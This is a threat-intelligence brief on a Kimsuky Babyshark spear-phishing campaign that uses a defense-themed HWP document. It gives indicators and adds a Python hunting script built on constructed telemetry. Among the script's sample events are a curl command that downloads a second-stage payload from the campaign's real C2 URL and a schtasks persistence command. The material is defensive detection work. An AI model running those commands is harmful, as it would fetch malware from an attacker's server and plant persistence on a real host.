Quick Overview of Babyshark Campaign Disguised as a Defense-themed HWP Document, Involving the Kimsuky APT Group
2025.01.22



*What is Babyshark?


Babyshark is a family of script-based (VBScript and PowerShell) information-stealing malware used by Kimsuky, a North Korean state-backed APT group that poses a threat to international security. Since at least 2019 it has been used to collect information from targets, and it is delivered primarily through malicious files or links attached to spear-phishing emails.



✅ Executive Summary:


1) Sample Information


On January 13, 2025, a phishing email disguised as a plan for a "Defense Industry Digital Innovation Seminar" was discovered and analyzed.


- Filename: [Original Email] Announcement of the Korean Defense Industry Society’s Defense Industry Digital Innovation Seminar Plan

- MD5: 8a801a356d5a7b3235b920e4d36336d2


2) Malware Behavior and Key Functions


The attached HWP document contains a malicious file embedded as an OLE object. When the object is executed, it drops additional files, establishes persistence, and retrieves further payloads from a command-and-control (C2) server.


The dropped file is Babyshark-type malware, and the C2 server delivers the final payload only to selected targets. In previous incidents, the final payload was identified as QuasarRAT.


3) Correlation Analysis


The C2 URL format, which carries "comline" as a query-string value, and the VBScript execution via the manifest file are consistent with the Babyshark malware attributed to the Kimsuky group.


Additionally, the name of the Windows scheduled task registered for persistence, "TemporaryStatescleanesdfrs," closely resembles the naming pattern observed in previous Babyshark campaigns that used the MSC file format.


4) Countermeasures


It is strongly recommended not to open attachments from unverified email sources and to block the execution of unverified embedded objects and hyperlinks within documents in order to mitigate this threat.



📌 How Does the Downloaded Payload Operate?


When the hyperlink in the PDF version is clicked, a script named 1212.bat, located in the same path as VBEdit, is executed. This script is a simple downloader: it uses the curl command to fetch additional files from the attacker's hard-coded C2 server and stores them locally.


- Download URL: hxxps[:]//www[.]elmer[.]com[.]tr/modules/mod_finder/src/Helper/1212_pprb_all/dksleks?newpa=comline

- Download Path: %AppData%\Microsoft\wis.db


The Babyshark C2 server checks the requesting IP address and serves the malicious payload only to selected victims. Although the payload path on the C2 server had been deleted by the time of analysis, previous Babyshark cases have distributed QuasarRAT, so the download of additional malware for remote control or data exfiltration should be expected.
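The following is a detection example for the 1212.bat downloader chain described above and for the scheduled-task persistence noted in the correlation section. It is added here as an illustration and is not code from the S2W report. It assumes process-creation telemetry in the shape of Sysmon Event ID 1 records; the sample events, the curl and schtasks command lines, and the task-name heuristic are constructed for this example, while the "comline" query value, the %AppData%\Microsoft\wis.db drop path and the task name "TemporaryStatescleanesdfrs" come from the brief.

```python
"""
Hunt for the Babyshark downloader and persistence behaviour in
process-creation telemetry (Sysmon Event ID 1 style records reduced to
the fields the logic needs).

Added example, not part of the S2W report. The events below are
constructed for illustration; only the indicators marked "from the brief"
come from the report itself.
"""
import re
from urllib.parse import urlparse, parse_qs

# Indicators from the brief
BABYSHARK_QUERY_VALUE = "comline"               # query-string value on the C2 URL
KNOWN_TASK_NAME = "TemporaryStatescleanesdfrs"  # scheduled task used for persistence

# Constructed sample events (not real logs from the incident). The command
# lines are assumed; the report gives only the URL, drop path and task name.
SAMPLE_EVENTS = [
    {   # 1212.bat step: curl fetches the second stage into %AppData%\Microsoft\wis.db
        "Image": r"C:\Windows\System32\curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": (r'curl -s -o "C:\Users\u\AppData\Roaming\Microsoft\wis.db" '
                        r'"https://www.elmer.com.tr/modules/mod_finder/src/Helper/1212_pprb_all/dksleks?newpa=comline"'),
    },
    {   # persistence: task registered from a script host (assumed command line)
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "CommandLine": (r'schtasks /create /sc minute /mo 5 /tn "TemporaryStatescleanesdfrs" '
                        r'/tr "wscript.exe C:\Users\u\AppData\Roaming\Microsoft\upd.vbs" /f'),
    },
    {   # benign curl download, must not match
        "Image": r"C:\Windows\System32\curl.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'curl -s -o C:\temp\latest.json https://api.github.com/repos/example/example/releases/latest',
    },
    {   # benign scheduled task, must not match
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'schtasks /create /sc daily /tn "Backup Documents" /tr "C:\tools\backup.exe"',
    },
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# %AppData% expands to <profile>\AppData\Roaming, so the brief's drop path
# %AppData%\Microsoft\wis.db appears on disk as ...\AppData\Roaming\Microsoft\wis.db
DROP_PATH_RE = re.compile(r"\\AppData\\Roaming\\Microsoft\\[^\\\s\"']+\.db\b", re.IGNORECASE)
TASK_NAME_RE = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def c2_urls(cmdline):
    """URLs on the command line whose query string carries the Babyshark marker value.
    Matching on the value rather than the key ('newpa') survives a renamed parameter."""
    hits = []
    for url in URL_RE.findall(cmdline):
        query = parse_qs(urlparse(url).query)
        if any(BABYSHARK_QUERY_VALUE in values for values in query.values()):
            hits.append(url)
    return hits


def drops_db_under_appdata(cmdline):
    """True if the command writes a .db file directly under %AppData%\\Microsoft."""
    return DROP_PATH_RE.search(cmdline) is not None


def task_name(cmdline):
    """Task name passed to schtasks /tn, or None."""
    m = TASK_NAME_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def suspicious_task_name(name):
    """Exact IOC match, or a heuristic for the observed pattern: readable words
    followed by a keyboard-mash suffix (trailing run of four or more consonants).
    The heuristic is an assumption drawn from the single name in the brief."""
    name = name.strip()
    if name == KNOWN_TASK_NAME:
        return True
    return re.search(r"[bcdfghjklmnpqrstvwxz]{4,}$", name) is not None


def hunt(events):
    """Return [(event index, [reasons])] for events matching any Babyshark indicator."""
    findings = []
    for idx, ev in enumerate(events):
        cmd = ev.get("CommandLine", "")
        image = ev.get("Image", "").lower()
        reasons = []
        for url in c2_urls(cmd):
            reasons.append("babyshark_c2_query: " + url)
        if image.endswith("curl.exe") and drops_db_under_appdata(cmd):
            reasons.append("db_drop_under_appdata_microsoft")
        if image.endswith("schtasks.exe"):
            name = task_name(cmd)
            if name and suspicious_task_name(name):
                reasons.append("suspicious_task_name: " + name)
        if reasons:
            findings.append((idx, reasons))
    return findings


if __name__ == "__main__":
    for idx, reasons in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {'; '.join(reasons)}")
```

Run against the constructed events, the two malicious records are flagged and the two benign ones are not. The query-value match is the most durable of the three checks, since the host and path of the C2 URL change between campaigns while "comline" has been reused; the task-name consonant-run heuristic will produce occasional false positives on legitimate names and is meant to be reviewed together with the parent process (a script host registering a task) rather than alerted on alone.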



✅ Recommended Threat Detection and Mitigation Actions:


- A phishing email disguised as a plan for the "Defense Industry Digital Innovation Seminar" was identified and analyzed on January 13, 2025.


- The HWP document attached to the email contains a malicious file embedded as an OLE object. Upon execution, it drops additional Babyshark-type files, establishes persistence, and retrieves further payloads from a C2 server.


- This malware downloads its final payload only for selected targets. In past cases, Babyshark has been used to deliver QuasarRAT for remote control and data theft.


- Users are strongly advised not to open attachments from unverified email sources. Blocking the execution of unverified embedded objects and hyperlinks in documents by default is essential to mitigate this threat before it reaches the payload stage.



🧑‍💻 Report Author: S2W TALON (Updated. 2025-01-15)


👉 Contact us: https://s2w.inc/en/contact


*The full report is available upon request and for QUAXAR subscribers.

